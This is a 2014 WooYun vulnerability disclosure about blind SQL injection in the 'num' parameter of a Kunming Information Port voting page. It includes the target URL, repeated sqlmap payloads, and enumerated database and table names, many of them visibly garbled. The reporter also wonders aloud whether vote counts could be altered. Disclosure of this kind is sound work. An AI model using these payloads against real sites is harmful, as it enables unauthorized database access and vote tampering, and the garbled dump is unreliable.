当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-073883

漏洞标题:昆明信息港分站sql注入

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2014-08-26 17:39

修复时间:2014-10-10 17:40

公开时间:2014-10-10 17:40

漏洞类型:

危害等级:低

自评Rank:3

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-08-26: 细节已通知厂商并且等待厂商处理中
2014-08-31: 厂商已经确认,细节仅向厂商公开
2014-09-10: 细节向核心白帽子及相关领域专家公开
2014-09-20: 细节向普通白帽子公开
2014-09-30: 细节向实习白帽子公开
2014-10-10: 细节向公众公开

简要描述:

 昆明信息港是云南省会昆明市统一的城市综合性互联网服务平台和信息化建设服务机构,由中共昆明市委、市人民政府主办,昆明报业传媒集团承办,信息港管理委员会运营管理。
  其中,城市门户和综合新闻网(www.kunming.cn),是国务院新闻办批准的国家一级资质新闻网站。

详细说明:

1.投票功能
投票方式:
(一)纸质投票。剪裁8月4日《昆明日报》12版上刊登的投票表,按要求进行填写并通过邮寄或直接送达,将选票交评选活动领导小组办公室(昆明市新闻中心912室)。投票表可复印,但须与原表大小一致。
(二)网络投票。登录昆明信息港网站(www.kunming.cn),进入“我们身边的好干部(好班子)”活动专栏,按要求投票。
(三)手机客户端投票。在手机上装载“掌上春城”客户端,进入好干部(好班子)活动专区,按要求投票。
(四)微信投票。关注“掌上春城”微信公众号kmzscc,点击进行投票
盲注http://vote.kunming.cn/smsvote/num.php?num=22&jsoncallback=? (GET)
num参数注入
2.

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: num
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: num=22' AND 6302=6302 AND 'XSUI'='XSUI&jsoncallback=?
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: num=22' AND SLEEP(5) AND 'dtsz'='dtsz&jsoncallback=?
---
web application technology: PHP 5.3.0
back-end DBMS: MySQL 5.0.11
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: num
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: num=22' AND 6302=6302 AND 'XSUI'='XSUI&jsoncallback=?
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: num=22' AND SLEEP(5) AND 'dtsz'='dtsz&jsoncallback=?
---
web application technology: PHP 5.3.0
back-end DBMS: MySQL 5.0.11
available databases [10]:
[*] `cmflrlanig><80fela`
[*] `fenn/.//`
[*] `hehx.//(`
[*] `ma_hafoOk\\@ea`
[*] DDDD
[*] hlphte
[*] k@cdat
[*] mysql
[*] rlrvnre
[*] vhtedb
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: num
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: num=22' AND 6302=6302 AND 'XSUI'='XSUI&jsoncallback=?
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: num=22' AND SLEEP(5) AND 'dtsz'='dtsz&jsoncallback=?
---
web application technology: PHP 5.3.0
back-end DBMS: MySQL 5.0.11
Database: mysql
[23 tables]
+-------------------------+
| cog g oWnoiv            |
| defh\categ@@@           |
| dellHrdhaX^^@           |
| fele\ajN^ng             |
| ndbPbinlngPib@x         |
| noocnH\_il              |
| o ke^oln__name          |
| oXbl_nP_o^@             |
| o^meL^^me               |
| rileXd:7>@>><hsZ0\_<  > |
| t@ld_xlneXtpan@ipi      |
| timLHxNLePleal_s@chh    |
| user                    |
| db                      |
| ddhlXthpic              |
| evenr                   |
| funb                    |
| h8hh@keppord            |
| host                    |
| phughh                  |
| proc                    |
| sepveps                 |
| skowWkog                |
+-------------------------+


漏洞证明:

1.投票功能盲注http://vote.kunming.cn/smsvote/num.php?num=22&jsoncallback=? (GET)num参数注入 不知道能不能改得票数
2.

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: num
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: num=22' AND 6302=6302 AND 'XSUI'='XSUI&jsoncallback=?
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: num=22' AND SLEEP(5) AND 'dtsz'='dtsz&jsoncallback=?
---
web application technology: PHP 5.3.0
back-end DBMS: MySQL 5.0.11
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: num
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: num=22' AND 6302=6302 AND 'XSUI'='XSUI&jsoncallback=?
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: num=22' AND SLEEP(5) AND 'dtsz'='dtsz&jsoncallback=?
---
web application technology: PHP 5.3.0
back-end DBMS: MySQL 5.0.11
available databases [10]:
[*] `cmflrlanig><80fela`
[*] `fenn/.//`
[*] `hehx.//(`
[*] `ma_hafoOk\\@ea`
[*] DDDD
[*] hlphte
[*] k@cdat
[*] mysql
[*] rlrvnre
[*] vhtedb
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: num
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: num=22' AND 6302=6302 AND 'XSUI'='XSUI&jsoncallback=?
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: num=22' AND SLEEP(5) AND 'dtsz'='dtsz&jsoncallback=?
---
web application technology: PHP 5.3.0
back-end DBMS: MySQL 5.0.11
Database: mysql
[23 tables]
+-------------------------+
| cog g oWnoiv            |
| defh\categ@@@           |
| dellHrdhaX^^@           |
| fele\ajN^ng             |
| ndbPbinlngPib@x         |
| noocnH\_il              |
| o ke^oln__name          |
| oXbl_nP_o^@             |
| o^meL^^me               |
| rileXd:7>@>><hsZ0\_<  > |
| t@ld_xlneXtpan@ipi      |
| timLHxNLePleal_s@chh    |
| user                    |
| db                      |
| ddhlXthpic              |
| evenr                   |
| funb                    |
| h8hh@keppord            |
| host                    |
| phughh                  |
| proc                    |
| sepveps                 |
| skowWkog                |
+-------------------------+


修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2014-08-31 09:43

厂商回复:

最新状态:

暂无